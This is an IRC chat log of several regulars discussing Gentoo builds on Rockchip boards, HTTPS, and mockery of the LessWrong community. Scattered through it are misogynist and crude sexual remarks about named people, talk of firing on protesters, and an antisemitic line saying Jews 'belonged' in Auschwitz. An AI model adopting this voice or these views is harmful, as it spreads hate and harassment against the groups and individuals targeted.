yeah, just like it's not likely neptune had to wait for bouvard and everything else for keppler. 1793298;1522956749;a111;Logged on 2018-04-05 16:36 asciilifeform: trinque: theoretically 'every private has a marshal's baton in his knapsack', but realistically it is not esp. likely that 'popping trb' had to wait for this 1 d00d to turn 19 or what he was. 1793299;1522956769;asciilifeform;hey any time a kepler wants to walk in... 1793300;1522956901;mircea_popescu;it's also improbable you were ever born, so good thing you weren't... 1793301;1522956906;mircea_popescu;?.? 1793302;1522956913;asciilifeform;lol 1793303;1522956967;asciilifeform;at any rate such probabilities and plausibilities only even in theory matter when a d00d walks in and 'hey i am such greatness'. if walks in with pill for rsa or whichever -- dun have to ask anyone to believe anyffin. or for that matter to walk in at a.. 1793304;1522956969;asciilifeform;ll. 1793305;1522957025;trinque;eh you have no idea how to react to the young, no offense. 1793306;1522957036;trinque;young man says "I will fuck every woman alive" and this doesn't mean he's broken 1793307;1522957059;asciilifeform;i did not say 'broken'. but raw - yes. 1793308;1522957070;trinque;sure 1793309;1522957083;mircea_popescu;http://btcbase.org/log/2018-04-05#1793210 << why not ? great incentive for you to move outta usistan. 1793310;1522957083;a111;Logged on 2018-04-05 17:01 asciilifeform: ave1: we had just the other day a thread re 'gnat pro'. it's interesting, in principle, but i sure as fucking daylight ain't ever signing nonredistribution oaths for a compiler 1793311;1522957098;asciilifeform;it is quite impossible to learn anything nontrivial if labouring under ' i am a great master and who needs this book-larnin rubbish' 1793312;1522957117;*;trinque doesn't dispute 1793313;1522957285;asciilifeform;mircea_popescu: [insert traditional a:'i dun have a power source outside of usa reich' m:'but why not learn to eat sunlight and butterflies' thread here] 1793314;1522957858;ben_vulpes;https://krebsonsecurity.com/2018/04/secret-service-warns-of-chip-card-scheme/ BingoBoingo ? 1793315;1522957922;asciilifeform;lol next krebs will ring the alarm re 'new, exciting' (... 200 yrs ago! but who needs this detail ) scam of lifting Official seals from paper with potato 1793316;1522958022;trinque;lol 1793317;1522958045;asciilifeform;worx great, btw 1793318;1522958124;trinque;asciilifeform, not just hacker, but timetraveling hacker!1!11 1793319;1522958152;asciilifeform;in other quasi-noose : asciilifeform currently taking suggestions re what proggies ought to live in a 'standard' arm-gentoo image that will be supplied to rockchip boxen subscribers 1793320;1522958191;asciilifeform;( input from prospective users specifically invited; even if 'wish list' item, that currently dun have a reliable arm64 build ) 1793321;1522958265;asciilifeform;for that matter, would also like to measure demand in l1/l2 for these, as a whole 1793322;1522958302;asciilifeform;though will add, unlike shared-hosting service, there is little to no practical barrier to leasing these out to heathens 1793323;1522958323;asciilifeform;(supposing coin-bearing heathens were to appear) 1793324;1522958662;mircea_popescu;asciilifeform eh, what, walk me throiugh this. let's use lesswrong codex as a basis. so : 1. you are in the hospital for "maybe wanting to kill yourself", after having made ill advised 1970s comments to 2010s paki diversity-"doctor" ; 2. "I remember working with a doctor who wanted to discharge his patient to some kind of outpatient drug rehab. The patient refused to go, so the doctor wouldn’t discharge her, and they were i 1793325;1522958662;mircea_popescu;n a stalemate over it for weeks, and the whole time the patient was tearfully begging the doctor to release her. I cannot tell you how much willpower it took not to sneak into the patient’s room and yell at her “JUST AGREE TO GO TO THE REHAB AND THEN DON’T DO IT, YOU IDIOT”." 1793326;1522958669;mircea_popescu;3. you... umm... publish it anyway. 1793327;1522958670;mircea_popescu;what now ? 1793328;1522958822;mircea_popescu;we have the perfect mechanism of antipantsuit publishing ; http://btcbase.org/log/2018-01-13#1770196 . what's the "color of bits" pantsuit system supposed to do, get trinque to swear in court you sent it to him ? 1793329;1522958822;a111;Logged on 2018-01-13 16:14 mircea_popescu: and it's for me ; when in doubt you can always check whose key an encrypted item is encrypted to. 1793330;1522958935;mircea_popescu;or perhaps we get the monumental lulz of http://trilema.com/2012/law-enforcement-never-fails-to-unintentionally-entertain/ with its "1. I am a Special Agent (“SA”) of the United States Secret Service (“USSS”), and have been so employed for approximately three and one half years. In my experience totallies!" 1793331;1522959089;mircea_popescu;http://btcbase.org/log/2016-06-07#1478250 << in other lulz, apparently scott alexander $item was actually well known ; what a fucking riot that yakkster mcyakkunson is, " most women might not bother trying to step down from there to men who radiate less kindness." hurr! 1793332;1522959089;a111;Logged on 2016-06-07 19:04 trinque: http://slatestarcodex.com/2013/04/06/polyamory-is-boring/#comment-13604 << yudkowski might be a cuck 1793333;1522959152;mircea_popescu;this is such a direct equivalent of yesterday's ballistic-gellatin wank it's starting to draw out a profile (for what i previously called the wikitard, but i guess lesswrong is just a particularily thick cloud of them) : asocial beta male that has managed to move the conceptual universe of cartoons into "real life" such as they live it. 1793334;1522959238;mircea_popescu;seinfeld's superman comics and cereal eating habits meet the yudkowski "oh, on the basis of the behaviours of the three goats we have back at camp, women like dweebs" and the "lalala i can't hear you, us army bb gun is very efficient when fired at gelatin 5 feet away and the fact that you'll never get that close nor ever have to fight large blobs irl IS NOT IN MY FIELD OF VISION" 1793335;1522959300;mircea_popescu;then they believe (pretend to "think critically", but do no such thing, simply believe) rank nonsense like "global warming" because... THE MODEL!!! the model reminds them of the simplified characters in the manga they loved as children and the general deus-ex-machina atmosphere fits well with their only formative experiences. 1793336;1522959320;mircea_popescu;and so pantsuit science emerges naturally, out of a certain kind of child abuse ; it no longer needs agency for explaining its existence. 1793337;1522959497;ben_vulpes;mmm subject of science https://theconversation.com/decolonise-science-time-to-end-another-imperial-era-89189 1793338;1522959515;trinque;nb.jpg thread, wondering where http://btcbase.org/log/2016-06-07#1478348 ever got off to 1793339;1522959515;a111;Logged on 2016-06-07 20:06 gabriel_laddel: you have no idea how much of a complete disaster my life is... 1793340;1522959738;asciilifeform;ave1: your gnat builder barfs 40 minutes in, incidentally, with the following death : http://p.bvulpes.com/pastes/ftgUL/?raw=true ( last n lines ) 1793341;1522959807;ben_vulpes;careful trinque you'll wake him 1793342;1522959819;ben_vulpes;beetlejuice beetlejuice beetlejuice 1793343;1522959821;asciilifeform;trinque: fulla gold, e.g. 'Yes, mathematics can be decolonised. Here’s how to begin' 1793344;1522959842;asciilifeform;by a 'Karin Brodie Professor of Education and Mathematics Education, University of the Witwatersrand' didjaknow. 1793345;1522959916;ben_vulpes;the science must fall video is epic, dood gets severely caned for daring to suggest that the notion a witch doctor can call lightning down upon ones enemis is not true 1793346;1522959923;ben_vulpes;"you must further decolonize yourself!" 1793347;1522959950;asciilifeform;http://btcbase.org/log/2018-04-05#1793333 << real life sadly is 'less real than cartoon', asciilifeform for instance is still waiting to be gassed for 'exporting' pgp somewhere during clinton reign, or for bolix warez, or for general unpatriotism, or jaywalking... 1793348;1522959950;a111;Logged on 2018-04-05 20:12 mircea_popescu: this is such a direct equivalent of yesterday's ballistic-gellatin wank it's starting to draw out a profile (for what i previously called the wikitard, but i guess lesswrong is just a particularily thick cloud of them) : asocial beta male that has managed to move the conceptual universe of cartoons into "real life" such as they live it. 1793349;1522960012;ben_vulpes;asciilifeform: quite relatedly, i had to calm a panicking millenial down recently "oh give over; the left is more interested in beating up on the right and vice versa than either are in the online shenanigans of a few crackpot bitcoin holders" 1793350;1522960033;asciilifeform;http://btcbase.org/log/2018-04-05#1793328 << traditionally $maxint soft is custom-doctored per licensee, making leaks obvious 1793351;1522960033;a111;Logged on 2018-04-05 20:07 mircea_popescu: we have the perfect mechanism of antipantsuit publishing ; http://btcbase.org/log/2018-01-13#1770196 . what's the "color of bits" pantsuit system supposed to do, get trinque to swear in court you sent it to him ? 1793352;1522960044;trinque;asciilifeform: at what point does the cultural gap become so wide you're intelligible to the gassers? 1793353;1522960051;trinque;"sounds like nerds doing nerd shit" 1793354;1522960051;asciilifeform;unintelligible ? 1793355;1522960068;ben_vulpes;asciilifeform: you've never lost a gun either i imagine 1793356;1522960085;asciilifeform;prolly long ago. can't picture why else asciilifeform , mod6 , ben_vulpes , other nato inmates doing their treasonous thing here, are still alive 1793357;1522960091;asciilifeform;re trinque's q ^ 1793358;1522960094;ben_vulpes;or excuse me, "had it stolen from my locked car!" 1793359;1522960114;asciilifeform;ben_vulpes: i thought one was supposed to lose'em while fishing!11 1793360;1522960149;ben_vulpes;mildly less plausible, hunters are more conscientious, also tools of trade/hobby 1793361;1522960166;ben_vulpes;"am derp cityboy, got gun stoled from locked car in bad neighborhood" 1793362;1522960171;trinque;all anyone does today is larp, from chiraq to palestine 1793363;1522960184;trinque;get seen, put it on da insta 1793364;1522960194;ben_vulpes;trinque: "world star hip hop" 1793365;1522960197;trinque;see: stormer and their "brand" 1793366;1522960201;asciilifeform;over here in marylandistan that'd get you a good sentence + confiscations automagically -- no gun in car without note from hitler Officially permitted 1793367;1522960235;trinque;heh, while TX has an exemption in concealed carry *for* to/from vehicle, and in. 1793368;1522960346;asciilifeform;typical breakfast conv : pet:'why you still alive' a:'evidently my entire work to date not yet worth bullet' 1793369;1522960369;*;asciilifeform brb 1793370;1522960977;mircea_popescu;asciilifeform> trinque: fulla gold, e.g. 'Yes, mathematics can be decolonised. Here’s how to begin' <<< ye olde "e=mc^2 is a sexed equation" wank ? 1793371;1522960994;mircea_popescu;part of the problem with these mediocre but ambitious shitstains is that they're so repetitive. 1793372;1522961120;mircea_popescu;ben_vulpes the left is actually cognitively incapable of representing tmsr, from my measurements. about as safe as rats in cretacic. 1793373;1522961163;mircea_popescu;asciilifeform think it though though. "obvious" how ? to whom ? where ? why ?etc. 1793374;1522961245;trinque;I came in more or less ideologically amenable, and yet said "oh god, not a bunch of redpillers" and left, the first encounter. 1793375;1522961254;trinque;cultural incomprehensibility is a thing 1793376;1522961324;trinque;minor barfs such as douchebag's might just be the sound of purging, who knows til later 1793377;1522961334;mircea_popescu;trinque> all anyone does today is larp, from chiraq to palestine << word. and the larp that they do is always and very amusingly a sort of first-person-cool. i was explaining a coupla days ago the mechanics of "pantsuit uprising" and how firing a line would send the whole field of 'em packing to deeply disbelieving girly. she honestly thought that if i march a 100 strong regiment to the sider of a 100`000 strong "color revol 1793378;1522961334;mircea_popescu;ution", ready-arm-fire and there's a fresh set of 80 or so bodies, teh crowd will do something other than what it does when "omg there's a shooting". like i dunno, charge the firing squad with bare hands or other "why didn't the jews burn down auschwitz mommy ?" 1793379;1522961344;mircea_popescu;"because THEY BELONGED THERE, baby ; and they knew it." 1793380;1522961411;mircea_popescu;"but won't anyone charge ?" "of course some will" "so won't that rally the others ?" "no, very much the opposite -- in making plain the difference between actually being a hero and larping, it'll bring home to the idiots that they REALLY have no business being there." 1793381;1522961439;mircea_popescu;the faster the nutty dozen run for the bayonetts, the faster ^ 3 the pantsuit run for the hills. 1793382;1522961462;*;trinque tries hard to imagine "majority" revolution, fails. herd mechanics always on the other end of the pointy stick. 1793383;1522961483;mircea_popescu;yet that's what the "moderate rebels" are supposedly managing, "majority revolutions". 1793384;1522961657;ben_vulpes;"i mean didja ever read about how the khans army could kill entire cities, and the populations would stand in the fields weeping and waiting their turn?" 1793385;1522961764;mircea_popescu;this is because, you realise, "soldiering wasn't the job THEY HAD CHOSEN FOR THEMSELVES". because "they didn't give a damn about whatever political axe you have to grind, just wanted..." 1793386;1522961781;mircea_popescu;and so following. people with hallucinated options at the ready are ~ballistic gelatin. 1793387;1522961812;mircea_popescu;that they don't understand how anyone else might not be, and wtf "good fucking luck hitting ME with your piddly 30 gram bullets lmao" sort of sociopathy is this!!!1 1793388;1522961835;mircea_popescu;i fully expect, once it comes to geolocated rape and pillage, to hear a lot of "you're illegal!!11". just like before. 1793389;1522962143;mircea_popescu;http://btcbase.org/log/2018-04-05#1793228 << it's certainly not the case there's nothing interesting to find digging. it may be premature, in his case, but w/e. 1793390;1522962143;a111;Logged on 2018-04-05 18:45 trinque: rce isn't the only thing that'd be interesting, even cpu bog-down or mem usage DoS would be relevant to staying at the front of the chain. 1793391;1522962191;mircea_popescu;http://btcbase.org/log/2018-04-05#1793234 << me also. hurr-durr you will not have a usg-free computer socio-engineering bs. 1793392;1522962191;a111;Logged on 2018-04-05 18:59 asciilifeform: unrelatedly, trinque , ever looked into purging sslism from gentoo ? in particular the existence of /etc/ca-certificates.conf and its contents as a ~mandatory package, i find quite irritating 1793393;1522962277;mircea_popescu;http://btcbase.org/log/2018-04-05#1793241 << i've been living for half a year now simply rejecting all websites what are https-only and implement idiotic "modern" ciphers. items such as github etc no longer load for me, and i tell you i don't particularly weep the demise of a bunch of retarded pantsuitsites. 1793394;1522962277;a111;Logged on 2018-04-05 19:04 asciilifeform: i can see an argument for retaining an ability to emulate a sslistic client, for http-fetching heathenware when absolutely must . but beyond this -- it Must Die 1793395;1522962289;mircea_popescu;not anymore than myspace or hojournal or w/e. 1793396;1522962380;mircea_popescu;http://btcbase.org/log/2018-04-05#1793252 << a good longer term goal, but don't sprain something lifting that. 1793397;1522962380;a111;Logged on 2018-04-05 19:07 trinque: "be responsible for everything considered republican portage" 1793398;1522962407;trinque;s'why I mention busybox later, might be only a handful of packages that get us to booted in userland 1793399;1522962432;trinque;from there, can consider *their* portage the "overlay", and can port things over as they come 1793400;1522962472;*;trinque has the busybox item coming together in a chroot, on the pizarro node 1793401;1522962551;mircea_popescu;nb 1793402;1522962687;mircea_popescu;http://btcbase.org/log/2018-04-05#1793274 << i use it, principally to manage curl. 1793403;1522962687;a111;Logged on 2018-04-05 19:12 trinque: I admittedly *don't* use bash in battlefield, but privately on the workbench 1793404;1522962847;mircea_popescu;http://btcbase.org/log/2018-04-05#1793307 << well fucking every woman alive with condom on seems a little deranged. 1793405;1522962847;a111;Logged on 2018-04-05 19:37 asciilifeform: i did not say 'broken'. but raw - yes. 1793406;1522967918;asciilifeform;http://btcbase.org/log/2018-04-05#1793393 << a quite astonishing amount of proggy, incl. items that cannot be done without unless you can make yer own ic ( errything from the lattice 'ice' proggy, to device drivers for ~100% of extant iron ) is imprisoned in shithub. nao however once it is sprung from this jail -- it is sprung. 1793407;1522967918;a111;Logged on 2018-04-05 21:04 mircea_popescu: http://btcbase.org/log/2018-04-05#1793241 << i've been living for half a year now simply rejecting all websites what are https-only and implement idiotic "modern" ciphers. items such as github etc no longer load for me, and i tell you i don't particularly weep the demise of a bunch of retarded pantsuitsites. 1793408;1522967993;asciilifeform;the 1 other httpsism i can think of that isn't escapable is www sites of iron-sellers. though for this one could use a dedicated toilet. 1793409;1522968041;asciilifeform;come to think of it, a little proxy box ( make out of ~anything, even pogo ) would handily do the job. think 'chinese firewall https stripper' for home lan. 1793410;1522968085;mircea_popescu;i don't envy any man the miserable but required portions of his job. 1793411;1522968095;mircea_popescu;and very much yes. 1793412;1522968108;*;asciilifeform cleans honeywagen 1793413;1522968131;asciilifeform;usb3ization test of 'rockchip' in progress, incidentally. 1793414;1522970135;lobbes;!!key ben_vulpes 1793415;1522970137;deedbot;http://wot.deedbot.org/4F7907942CA8B89B01E25A762AFA1A9FD2D031DA.asc 1793416;1522972480;mircea_popescu;"Robin Hanson is right that no-one wants to speak up for the low-status males for fear of being grouped with them. I for one feel compelled to make clear from the outset that I’m a *terribly* high status male who is *overwhelmed* with interest from women, and am only speaking up for those less fortunate than me out of the purest generosity of spirit" << this guy : https://mindsarentmagic.org/ 1793417;1522972492;mircea_popescu;hoooooly shit is the wikitard "lesswrong" crowd the comedy goldmine of all tiem 1793418;1522972530;mircea_popescu;google cryptographer from london! 1793419;1522972532;asciilifeform;mircea_popescu: btw , d00d is a vintage lolcow, e.g. http://btcbase.org/log/2016-06-07#1478076 1793420;1522972532;a111;Logged on 2016-06-07 18:18 asciilifeform: some derp named hanson was pushing a crackpottery called 'futarchy', where you have a bitbet-like item that is actually plugged into a robotic monarch that issues edicts 1793421;1522972559;mircea_popescu;i thought futa is how you say "cartoon transsexual" 1793422;1522972564;asciilifeform;( he's, approx., a chowdhry . or what was that one called ) 1793423;1522972603;asciilifeform;mircea_popescu: i found this meaning out from mircea_popescu , believe or not. prior to that knew only from $d00d's crackpottery with 'future markets' (itself stolen from old man admiral poindexter iirc ) 1793424;1522972623;mircea_popescu;aok 1793425;1522972628;asciilifeform;( not to be confused with futures markets ) 1793426;1522972805;deedbot;http://trilema.com/2018/heres-what-polyamory-is-not/ << Trilema - Here's what "polyamory" is not : 1793427;1522972871;mircea_popescu;basically this wikipedian wankster thing seems to be a major-ish neet subculture. evidently under the whole chems thing, or guns, or "baptist"ism / most other first echelon things. but perhaps large enough to make 2nd tier, with post-punk, petaism, and so forth. a sort of mirror-knitting subculture, i guess. 1793428;1522972931;asciilifeform;dunno that 'subculture' is the word. sorta like calling syphilis a subculture 1793429;1522972978;mircea_popescu;syphilis very much was a subculture. 1793430;1522972998;asciilifeform;then this also 1793431;1522973002;mircea_popescu;diseases are in fact the best framework for conceptualizing subcultures -- that's what they are, broken people. broken how is relatively uninteresting. 1793432;1522973055;mircea_popescu;but the girl who genuinely believes her little village is everything and being a dairy maid is the be all (great little novel about this, with nobleman who married dairy maid, ended up making the dutchess a... dairy) is not substantially different from the guy who thinks mercury salts will right him. 1793433;1522973079;mircea_popescu;they both have little rituals associated, consume information cooked a certain way FOR IT BEING THUS COOKED and not for other reasons, and so following. 1793434;1522973101;deedbot;http://www.thedrinkingrecord.com/2018/04/05/4-months-in-montevideo/ << Bingo Blog - 4 Months In Montevideo 1793435;1522973187;mircea_popescu;oh, oh, look, there's even a bit of mittelamerica in there! "I came home from my tour in the US Army in the Middle East. I have only been back two months. My wife and I have three children. We have been married for ten years. I came back and Sarah had changed. Didn’t want anything to do with me. This is typical for returning Veterans so I figured it would just take time. Fast forward to now, I just discovered, she has been 1793436;1522973188;mircea_popescu;recruited as a “unicorn” by a Neurologist at a hospital in town. She abandoned me and our middle child who has Autism. She took the youngest and oldest boy and they are considered now Mitch’s children. So, excuse me if I can’t be open minded enough to understand this. I don’t. It hurts incredibly bad and I don’t understand how a doctor, with a wife and six children, could steal my wife and try to take my children." 1793437;1522973209;asciilifeform;!#s dependopotamus 1793438;1522973209;a111;20 results for "dependopotamus", http://btcbase.org/log-search?q=dependopotamus 1793439;1522973284;asciilifeform;and wtf is to be 'recruited as unicorn' 1793440;1522974158;asciilifeform;in other noose, liftoff on rockchip-cum-usb3-ssd 1793441;1522974174;asciilifeform;( boots from sd, mounts root on usb3 ) 1793442;1522974504;mircea_popescu;asciilifeform "unicorn" in context is the traditional soubrette : young woman eager to [sexually, and otherwise] please both master and mistress. 1793443;1522974509;asciilifeform;aa 1793444;1522974521;mircea_popescu;supposedly these are rare. i imagine for the sort of dweebs that spew all this maculature they would be. 1793445;1522974585;asciilifeform;phunphakt for trinque : apparently something inside current-day portage re-package.mask's gcc <5 'for your own good' on every (?) --sync , leaving it to be unmasked manually. 1793446;1522974614;asciilifeform;ye olde 'These old versions of toolchain packages (binutils, gcc, glibc) are no longer officially supported and are not suitable for general use. Using these packages can result in build failures (and possible breakage) for many packages, and may leave your system vulnerable to known security exploits' nonsense. 1793447;1522974616;mircea_popescu;you know, the "terribly high status male" in the googlvnoye upgradleniye lagerei. 1793448;1522974741;mircea_popescu;o look, the dgerard fellow also makes an appearance! lel. 1793449;1522974749;mircea_popescu;this whole thing's tiny, basically the wank of ~one campus. 1793450;1522974841;asciilifeform;https://mindsarentmagic.org/2016/07/18/expressing-computable-ordinals-as-programs << stolen , with 0 attribution, from chaitin 1793451;1522974858;mircea_popescu;i think they call this research. 1793452;1522974863;asciilifeform;ahahahayes 1793453;1522974887;mircea_popescu;it's really not anything but 15yo turning in wikipedia article. 1793454;1522974896;asciilifeform;'EDIT 2017-10-28: DO NOT DO THIS! Dropbox have changed their API, and Netmemo has failed to update to use the new one. I emailed the developer and got no response. Don’t use Netmemo Plus. I want a button on my Android phone that drops voice notes into my GTD inbox.' 1793455;1522974910;asciilifeform;loox like a specimen of... homo kanzureicus 1793456;1522974968;asciilifeform;'Superforecasting: The Art and Science of Prediction. .... This book is essential reading for all thinking people. I’m not going to write a new review here—I think the existing reviews do it justice...' << bahahawat 1793457;1522974981;mircea_popescu;https://www.lesswrong.com/posts/WX6kWkAKsESoD4yrf/misery-pits << o look who came back from the dead, also. chick famous for "i'll sign prenup to have all my kids paternity-checked because i'm just too much of a cum dumpster to know otherwise" / being the ~only sexually active female in this coven of "polyamory", absent since the last time we heard of this whole thing. 1793458;1522974988;asciilifeform;and of course 'Big life change ahead: in March, I, Jess, and our two cats will be renting out our London flat and moving to California’s San Francisco Bay Area for two years!' 1793459;1522975424;asciilifeform;mircea_popescu: oh hey it's the 'my cunt is offended and redpillists are hereby unofficially banned from the forum' critter 1793460;1522975453;mircea_popescu;sadly i'm too lazy to translate http://trilema.com/2010/familia-traditionala-versus-harem-studiu-comparativ/ ; but the comments are pretty riotous. sampler : "in closing, permit me to inform you that i've taken a shit into one of those cups you drink jeebus blood from, in some church somewhere, as well as washed my cock post-ejaculation in one of those water holders somewhere in some other church. but i'm not going to mention 1793461;1522975453;mircea_popescu; which exactly, so you can live from now on in the full serenity of knowing that it's perfectly possible you've been kissing my ass a number of times to date. all the best." 1793462;1522975694;mircea_popescu;actually, fuck that, i have to transalte it, willy nilly. 1793463;1522975704;asciilifeform;another interesting... character reappears in $thread , 'cousin_it' << iirc , a ru d00d, who was what passed for intellectual backbone of the lw forum until formally expelled for -- iirc -- pissing on the 'roko's basilisk' chix 1793464;1522975719;mircea_popescu;talk about absent options ;/. 1793465;1522975758;mircea_popescu;asciilifeform i imagine the way that works is "about one third of the class of phds hanging about mass campuses". 1793466;1522975766;mircea_popescu;exactly like drama class in highschool. 1793467;1522975843;mircea_popescu;so maybe his phd / patience with the idiocy ran out. 1793468;1522975870;asciilifeform;something ran out. at any rate i did not expect to see him return to same heathenpit 1793469;1522975966;asciilifeform;'This post is literally the sort of thing trigger warnings were invented for' << elsewhere in $link 1793470;1522976148;asciilifeform;from earlier $entomo-specimen, https://mindsarentmagic.org/2015/08/06/as-an-aside-something-should-be-done-about-drones << 'something should be done!111'(tm)(r) 1793471;1522976241;*;asciilifeform maxed dosimeter, goes back to wurk 1793472;1522976359;asciilifeform;!!up gabriel_laddel 1793473;1522976359;deedbot;gabriel_laddel voiced for 30 minutes. 1793474;1522976383;gabriel_laddel;beetlejuice is suffering gainful employment writing java for the time being 1793475;1522976411;asciilifeform;gabriel_laddel: ... congrats . asciilifeform did a ~2yr sentence of java mine 1793476;1522976612;gabriel_laddel;managed to kill a x220 circuit board by swapping the screen to another, identical while machine was running. is this the sort of thing to 'fry' circuitry, and as a general rule I suppose no life fire electronics around CPUs? 1793477;1522976652;asciilifeform;gabriel_laddel: lvds i/o typically dun have antistatic diodes 1793478;1522976665;asciilifeform;given as it doesn't expect to be fingered 1793479;1522976692;asciilifeform;gabriel_laddel: i gotta ask, what possessed you to do it with box switched on 1793480;1522976784;ben_vulpes;is that the difficult-to-replace version? 1793481;1522976801;ben_vulpes;and yeah, what asciilifeform said. also hola beetlejuice 1793482;1522976819;asciilifeform;ben_vulpes: afaik the 220 is a cheapo and plentiful rubbish box 1793483;1522976829;gabriel_laddel;wanted to know how ready-for-anything people are making electronics nowdays, seeing as I know literally nothing about hardware. ben_vulpes hola & idk, never soldered anything before so should be fun 1793484;1522976899;gabriel_laddel;mircea_popescu American Honey review, or totally unwatchable? 1793485;1522976923;mircea_popescu;mmm 1793486;1522976959;mircea_popescu;torrentmaster has no recollection ; possibly was never found. 1793487;1522977061;asciilifeform;trinque, other gentooists : another interesting discovery : portage has a hard ( but wholly imho spurious ) dependency on working system clock 1793488;1522977228;ben_vulpes;these turds you dig up, asciilifeform 1793489;1522977260;asciilifeform;hey this is 1st time i gentooated a box with no batteried clocks 1793490;1522977413;asciilifeform;( keep in mind, this box is cheaper than mircea_popescu's cigar ) 1793491;1522977682;ben_vulpes;oh i know, still amazed 1793492;1522977948;gabriel_laddel;lobbes http://mazepath.com/uncleal/qz4.htm is why Uncle Al is known, though the rest of his work is great. There are 2-3 other pages that go along with it if you really dig 1793493;1522978034;gabriel_laddel;also http://yarchive.net/ 1793494;1522978107;trinque;asciilifeform: huh, what'd it care about in particular? 1793495;1522978132;trinque;"onoes trying to replace file that claims newer on fs when updating?" 1793496;1522978152;asciilifeform;trinque: bombs with 'downloaded file is newer than current time' or something to that effect 1793497;1522978173;asciilifeform;i.e. 'fuckyou terrorist, seems you ain't running ntp' 1793498;1522978176;asciilifeform;!!up gabriel_laddel 1793499;1522978176;deedbot;gabriel_laddel voiced for 30 minutes. 1793500;1522978177;trinque;bug of the we-put-that-there variety aha 1793501;1522978186;trinque;ohey gabriel_laddel lives 1793502;1522978189;trinque;good evening 1793503;1522978334;trinque;http://btcbase.org/log/2018-04-06#1793445 << yep, they put the smoker's warning label on it 1793504;1522978334;a111;Logged on 2018-04-06 00:29 asciilifeform: phunphakt for trinque : apparently something inside current-day portage re-package.mask's gcc <5 'for your own good' on every (?) --sync , leaving it to be unmasked manually. 1793505;1522978361;asciilifeform;trinque: the interesting part is that it comes back ~after repeated manual removal~ somehow 1793506;1522978370;asciilifeform;( exactly how -- i did not yet unearth ) 1793507;1522978383;trinque;later it'll do same, but clang vs gcc 1793508;1522978419;asciilifeform;i'm almost surprised there is any gcc left in'ere 1793509;1522978439;asciilifeform;evidently 'ministry of plenty' behind schedule 1793510;1522978474;trinque;https://wiki.gentoo.org/wiki/Clang#Clang_environments << hey you can test the glorious future today 1793511;1522978523;asciilifeform;reminds me, i was in a train station, and everywhere there were billboards pushing 'milk of the future'(tm)(r), made --no, not from soy even -- but recycled peas. 1793512;1522978558;asciilifeform;mircea_popescu's '80s acorn coffee 'nervously smokes in the corner' compared to this 1793513;1522978592;ben_vulpes;recycled? what even 1793514;1522978609;asciilifeform;well what else to call it 1793515;1522978645;mircea_popescu;heh 1793516;1522978650;mircea_popescu;!#s nechezol 1793517;1522978650;a111;0 results for "nechezol", http://btcbase.org/log-search?q=nechezol 1793518;1522978660;mircea_popescu;^ ceausescu's "coffee" made of burnt rye. 1793519;1522978662;asciilifeform;ah the oats one 1793520;1522978667;asciilifeform;acorns were german 1793521;1522978668;mircea_popescu;"a necheza" = to neigh ; -ol, chemical. 1793522;1522978711;asciilifeform;lolnotbad 1793523;1522979091;asciilifeform;in other noose, ~143MB/s avg. reads , ~33MB/s writes, on samsung usb3 stick ( vs ~20 / 15 on sd prior ) 1793524;1522979680;deedbot;http://trilema.com/2018/traditional-family-vs-the-harem-a-comparative-study/ << Trilema - Traditional family vs the harem, a comparative study 1793525;1522982775;mircea_popescu;!!up MTW 1793526;1522982775;deedbot;MTW voiced for 30 minutes. 1793527;1522983279;mircea_popescu;asciilifeform you know, the girls make almond milk ocasionally. 1793528;1522984379;lobbes;aha ty for teh link gabriel_laddel 1793529;1522984793;douchebag;!!up MTW 1793530;1522984793;deedbot;MTW voiced for 30 minutes. 1793531;1522984800;douchebag;Yo MTW 1793532;1522984804;douchebag;Hows it going ? 1793533;1522988818;asciilifeform;in other noose : 52 minutes for complete kernel build for rockchip, on itself. 1793534;1522988842;asciilifeform;which imho is notbad. 1793535;1522993803;mircea_popescu;indeed. 1793536;1523027890;deedbot;http://qntra.net/2018/04/duterte-receives-support-from-russia-and-china-as-usg-state-spurns-another-longtime-ally/ << Qntra - Duterte Receives Support From Russia And China As USG.STATE Spurns Another Longtime Ally 1793537;1523028894;deedbot;http://qntra.net/2018/04/intel-kills-internet-of-shit-remote-management-app-after-realizing-security-model-broken/ << Qntra - Intel Kills Internet Of Shit Remote Management App After Realizing Security Model Broken 1793538;1523034082;asciilifeform;!!up MDude 1793539;1523034083;deedbot;MDude voiced for 30 minutes. 1793540;1523034403;MDude;Now to remember the thing I was going to say roughly five seconds before joining the channel. 1793541;1523034491;BingoBoingo;Who is your daddy and what does he do? 1793542;1523034915;MDude;Hey, I'm a police offic-*rining from my concealed earpiece:"SHIT, DAMNIT, HE'S TRYING TO TRICK YOU."* 1793543;1523035014;MDude;Anyway, I think there were a few things I was thinking of for a bit, one of them being gopher://vernunftzentrum.de/0/ckeen/ciy-manifesto.txt . 1793544;1523035058;ben_vulpes;a gopher link, how retro-hip 1793545;1523035368;asciilifeform;this, i think, is a first 1793546;1523035469;MDude;Yeah, if that manages to go anywhwere, it'd be neat if making your own gopher browser and server would be a part of it. 1793547;1523035545;trinque;what brings you MDude, other than itchy-stump need for in-group signaling? 1793548;1523035595;phf;oblig http://btcbase.org/log/2017-11-23#1742487 1793549;1523035595;a111;Logged on 2017-11-23 16:20 phf: re upstack, there's been a resurgence of sorts of gopher protocol, various hipsters spinning up personal websites, etc. whether the resurgence was shortlived or i'm just late to the game, but there's already a community of wreckers (one of them groups is coming from this federated twitter platform, mastodon) discussing all the various ways that they want to "improve" gopher, tls, utf-8, markdown renderer, "minimal subset of html", etc. but at the same 1793550;1523035939;TomServo;I fell down the gopherhole after phf mentioned it.. came across a pseudo-tmsr 'bitreich'. 1793551;1523036056;trinque;!!up MDude 1793552;1523036057;deedbot;MDude voiced for 30 minutes. 1793553;1523036065;trinque;MDude: don't pm me; I don't know you 1793554;1523036073;trinque;last chance to say something that isn't word salad. 1793555;1523036095;asciilifeform;TomServo: lol, just how comically idiot was the parody-tmsr ? do they use dsa keys, kept in keybase ? their mp is bulgarian ? their linux -- rathead ? 1793556;1523036118;phf;asciilifeform: http://gopher.floodgap.com/gopher/gw?a=gopher%3A%2F%2Fbitreich.org 1793557;1523036133;phf;they are more of a suckless spinoff 1793558;1523036139;TomServo;asciilifeform: perhaps I've been too generous... perhaps.. phf has it. 1793559;1523036187;asciilifeform;'The gopher onion initiative started.' << lol! 1793560;1523036198;asciilifeform;( from 'chronology' pg ) 1793561;1523036272;asciilifeform;good bit of uniturd orcacola glypholade in this supposed 'suckless' www. 1793562;1523036293;trinque;well christ, they have a manifesto right there at the top. 1793563;1523036297;trinque;heil bitler 1793564;1523036346;asciilifeform;http://gopher.floodgap.com/gopher/gw?gopher://bitreich.org:70/0/documents/bitreich-manifesto.md << >> https://www.oglaf.com/humans 1793565;1523036372;lobbes;" 